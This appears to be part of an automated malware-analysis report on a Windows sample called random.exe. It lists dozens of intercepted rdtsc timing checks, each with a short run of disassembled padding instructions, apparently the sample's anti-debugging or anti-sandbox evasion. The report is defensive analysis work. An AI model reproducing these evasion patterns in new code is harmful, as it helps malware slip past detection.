      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117E05 second address: 1117E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117E09 second address: 1117E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117E11 second address: 1117E39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFAh 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FA8D8E1DD07h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117E39 second address: 1117E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA8D8E164A6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jl 00007FA8D8E164A6h 0x00000019 jnc 00007FA8D8E164A6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA8D8E164B9h 0x00000027 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117E74 second address: 1117E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117A04 second address: 1117A16 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA8D8E164A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117A16 second address: 1117A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117A1C second address: 1117A22 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117BB5 second address: 1117BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 11209E5 second address: 11209EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 11209EA second address: 11209EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112B5E2 second address: 112B5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112B5E8 second address: 112B5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112B5EE second address: 112B60F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA8D8E164A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FA8D8E164A6h 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007FA8D8E164A6h 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FC4B second address: 112FC72 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA8D8E1DD09h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FC72 second address: 112FC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FC76 second address: 112FC7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FC7A second address: 112FC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jg 00007FA8D8E164A6h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FC8A second address: 112FCB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007FA8D8E1DCF6h 0x00000012 pop edi 0x00000013 popad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FCB3 second address: 112FCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FCB9 second address: 112FCC3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FCC3 second address: 112FCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 113726A second address: 1137276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jo 00007FA8D8E1DCF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1137276 second address: 113727D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1137788 second address: 113779E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jng 00007FA8D8E1DCF6h 0x0000000f js 00007FA8D8E1DCF6h 0x00000015 popad 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 113779E second address: 11377A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 11377A3 second address: 11377A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 11377A9 second address: 11377AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1137BD8 second address: 1137BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 113C249 second address: 113C261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007FA8D8E164ACh 0x0000000b jnl 00007FA8D8E164A6h 0x00000011 pop esi 0x00000012 push edi 0x00000013 push edi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 113F72E second address: 113F738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 113F738 second address: 113F73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 113F73D second address: 113F775 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FA8D8E1DD08h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 pushad 0x00000011 jbe 00007FA8D8E1DCF6h 0x00000017 jo 00007FA8D8E1DCF6h 0x0000001d jl 00007FA8D8E1DCF6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 114B2B3 second address: 114B2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164AFh 0x00000009 popad 0x0000000a jno 00007FA8D8E164B4h 0x00000010 je 00007FA8D8E164B2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 114B2E3 second address: 114B307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA8D8E1DCF6h 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA8D8E1DD00h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 114B307 second address: 114B30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 11588BE second address: 11588C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 11585E7 second address: 11585ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D5C0 second address: 116D5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D5C4 second address: 116D5E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B4h 0x00000007 jnp 00007FA8D8E164A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D5E2 second address: 116D5E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D5E7 second address: 116D5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D5ED second address: 116D61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DD03h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FA8D8E1DCFBh 0x00000012 jbe 00007FA8D8E1DCF6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D920 second address: 116D924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D924 second address: 116D936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D936 second address: 116D946 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA8D8E164B2h 0x00000008 jc 00007FA8D8E164A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D946 second address: 116D96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DD06h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FA8D8E1DCF6h 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116DAC1 second address: 116DAC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116DAC7 second address: 116DACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116DACB second address: 116DAF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007FA8D8E164A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007FA8D8E164B9h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116DAF7 second address: 116DB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA8D8E1DCF6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116FE43 second address: 116FE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1174062 second address: 1174068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1174068 second address: 1174075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1174075 second address: 1174090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 117584C second address: 1175850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1175850 second address: 117585A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA8D8E1DCF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 117585A second address: 1175864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1175864 second address: 1175870 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA8D8E1DCF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1175870 second address: 117587A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA8D8E164ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 117784E second address: 1177858 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B08DA second address: 55B08EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 776AE624h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B08EE second address: 55B08F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B08F2 second address: 55B08F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B08F8 second address: 55B096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FA8D8E1DCFEh 0x00000010 xchg eax, ecx 0x00000011 pushad 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 mov bl, al 0x00000018 popad 0x00000019 mov edx, 237B7F38h 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FA8D8E1DCFEh 0x00000025 xchg eax, ecx 0x00000026 pushad 0x00000027 call 00007FA8D8E1DCFEh 0x0000002c pushad 0x0000002d popad 0x0000002e pop esi 0x0000002f movsx ebx, cx 0x00000032 popad 0x00000033 xchg eax, esi 0x00000034 jmp 00007FA8D8E1DD08h 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B096E second address: 55B0972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0972 second address: 55B0976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0976 second address: 55B097C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B097C second address: 55B0992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DD02h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0992 second address: 55B09CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FA8D8E164B7h 0x0000000e lea eax, dword ptr [ebp-04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA8D8E164B5h 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B09CC second address: 55B09FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FA8D8E1DD02h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA8D8E1DCFEh 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B09FB second address: 55B0A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164AEh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0A0D second address: 55B0A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0A11 second address: 55B0A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FA8D8E164B7h 0x0000000e push dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA8D8E164B5h 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0A7A second address: 55B0A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0A80 second address: 55B0A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0AD5 second address: 55B0AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0AD9 second address: 55B0ADF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0ADF second address: 55B0B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 1F6A9BB8h 0x00000008 call 00007FA8D8E1DD01h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0B03 second address: 55B0B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0B07 second address: 55B0B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0B0D second address: 55A0016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007FA8D8E164B6h 0x0000000f retn 0004h 0x00000012 nop 0x00000013 cmp eax, 00000000h 0x00000016 setne al 0x00000019 xor ebx, ebx 0x0000001b test al, 01h 0x0000001d jne 00007FA8D8E164A7h 0x0000001f sub esp, 04h 0x00000022 mov dword ptr [esp], 0000000Dh 0x00000029 call 00007FA8DD4F7CB7h 0x0000002e mov edi, edi 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 call 00007FA8D8E164ADh 0x00000038 pop ecx 0x00000039 push edx 0x0000003a pop ecx 0x0000003b popad 0x0000003c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0016 second address: 55A0027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 mov edx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov edx, ecx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0027 second address: 55A0038 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 68047FB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cl, C0h 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0038 second address: 55A003E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A003E second address: 55A0042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0042 second address: 55A0062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA8D8E1DD05h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0062 second address: 55A0068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0068 second address: 55A006C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A006C second address: 55A0070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0070 second address: 55A0080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0080 second address: 55A0086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0086 second address: 55A008B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
